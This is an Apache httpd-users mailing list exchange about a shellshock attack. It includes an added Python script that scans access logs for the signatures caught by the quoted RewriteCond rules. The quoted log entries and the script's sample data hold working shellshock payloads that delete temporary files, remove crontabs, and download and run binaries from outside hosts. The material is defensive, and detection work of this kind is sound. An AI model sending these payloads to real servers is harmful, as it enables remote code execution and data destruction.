httpd-users mailing list archives

From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 05:10:44 GMT
On 02.07.2015 17:55, Kurtis Rader wrote:
> On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <victor@casnt.ro> wrote:
>
>     A hacker attacked an apache2 web server by HTTP injection.
>     The log shows what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future, and how can I reproduce it?
>     I tried to reproduce it, but it is not clear how he launched this command,
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>
> That's a shellshock attack. I use the following rewrite rule to detect 
> them so my monitoring software can automatically block the source of 
> the attack. The /blocked.php script sets the HTTP status to 400.
>
> # This protects against attempts to exploit the Bash execution bug (known as
> # "shellshock"). We're not susceptible to the attack but this makes it easy to
> # spot the attack and blackhole the source. See
> # http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29
> RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
> RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
> RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]
>
> Here's the log entry for the most recent attack the above rule caught (I have a custom log format):
>
> 2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616 194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""
>
>
> -- 
> Kurtis Rader
> Caretaker of the exceptional canines Junior and Hank

Thank you.
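The rewrite rules in the reply catch the probe at request time; the same signatures can be run over an existing access log to find out which sources have already been probing. The script below is an added example, not code from this thread or from the httpd project. It translates the four RewriteCond patterns into regexes and runs them over lines in Apache's "combined" LogFormat (assumed; Kurtis uses a custom format). The sample log lines are constructed: the first two are abridged or reformatted versions of the entries quoted above, the rest use RFC 5737 documentation addresses. HTTP_COOKIE is not written to the combined log, so that condition has no equivalent here.

```python
"""Detect shellshock-style probes in Apache combined-format access logs.

Added example, not code from the thread. It translates the RewriteCond
patterns posted above into regexes and runs them over log lines. The
SAMPLE_LOG entries are constructed: two are abridged from the thread,
the others use documentation (RFC 5737) addresses.
"""
import re
from typing import List, Optional, Tuple

# Equivalent of the header conditions "^\(\)\s{": the value starts with "() {".
# \s* is used instead of the rule's single \s so spacing variants are caught too.
SHELLSHOCK_HEADER = re.compile(r"^\(\)\s*\{")
# Equivalent of the QUERY_STRING condition "^.*=\(\)": "=()" anywhere in the query.
SHELLSHOCK_QUERY = re.compile(r"=\(\)")

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Apache escapes embedded quotes in logged values as \", so quoted fields are
# matched with (?:[^"\\]|\\.)* rather than [^"]*.
COMBINED_LOG = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

SAMPLE_LOG: List[str] = [
    # Abridged from the entry in the original question: payload in User-Agent.
    '62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" '
    '404 280 "-" "() { :;};/usr/bin/perl -e \'print \\"XSUCCESS!\\";'
    'system(\\"wget http://80.68.94.216/sc.gif\\");\'"',
    # The entry from the reply, rewritten from its custom format into combined format.
    '194.8.18.88 - - [28/Jun/2015:06:08:02 +0000] "GET / HTTP/1.0" 400 616 "-" '
    '"() { :;}; /bin/bash -c \\"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\\""',
    # Ordinary request, must not match.
    '192.0.2.10 - - [03/Jul/2015:08:10:44 +0300] "GET /index.html HTTP/1.1" 200 1234 '
    '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    # Payload in the query string (URL-encoded spaces; "=()" is still literal).
    '198.51.100.7 - - [03/Jul/2015:08:12:00 +0300] '
    '"GET /cgi-bin/test.cgi?cmd=()%20{%20:;};%20/bin/echo HTTP/1.1" 404 280 "-" "curl/7.42.1"',
    # Payload in the Referer header.
    '203.0.113.4 - - [03/Jul/2015:08:13:30 +0300] "GET /cgi-bin/env.cgi HTTP/1.1" 200 512 '
    '"() { :;}; /usr/bin/id" "Mozilla/5.0"',
]


def parse_combined(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_LOG.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def query_string(request: str) -> str:
    """Return the query part of the request-line target ("" if none).

    The request line is "METHOD target PROTOCOL"; a hostile target may contain
    spaces, so everything between the first and last token is the target.
    """
    parts = request.split(" ")
    if len(parts) < 3:
        return ""
    target = " ".join(parts[1:-1])
    return target.partition("?")[2]


def classify(line: str) -> Optional[str]:
    """Name the field carrying a shellshock signature, or None.

    Mirrors the RewriteCond checks; HTTP_COOKIE is not in the combined log,
    so only the query string, Referer and User-Agent are examined.
    """
    entry = parse_combined(line)
    if entry is None:
        return None
    if SHELLSHOCK_QUERY.search(query_string(entry["request"])):
        return "query-string"
    if SHELLSHOCK_HEADER.match(entry["referer"]):
        return "referer"
    if SHELLSHOCK_HEADER.match(entry["agent"]):
        return "user-agent"
    return None


def scan(lines) -> List[Tuple[str, str]]:
    """Return (client address, matching field) for every line that matches."""
    hits = []
    for line in lines:
        field = classify(line)
        if field is not None:
            hits.append((parse_combined(line)["host"], field))
    return hits


def sources_to_block(lines) -> List[str]:
    """Distinct client addresses to blackhole, as the reply's monitoring does."""
    return sorted({host for host, _ in scan(lines)})


if __name__ == "__main__":
    for host, field in scan(SAMPLE_LOG):
        print(f"{host:<16} shellshock signature in {field}")
    print("block:", ", ".join(sources_to_block(SAMPLE_LOG)))
```

Run it against a real log with `scan(open("/var/log/apache2/access.log"))`. Two points worth keeping in mind when reading the original entry: the payload does not depend on the requested path existing, because it rides in the User-Agent header, which a CGI handler copies into the script's environment, and an unpatched bash then parses any environment value beginning with `() {` as a function definition and executes what follows. The 404 therefore only tells you that `/phppath/cgi_wrapper` was one of several well-known CGI paths the scanner tried. The rewrite rule itself can be exercised on a test instance with a request such as `curl -A '() { :;}; echo' http://localhost/`, which should come back as the 400 from /blocked.php.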
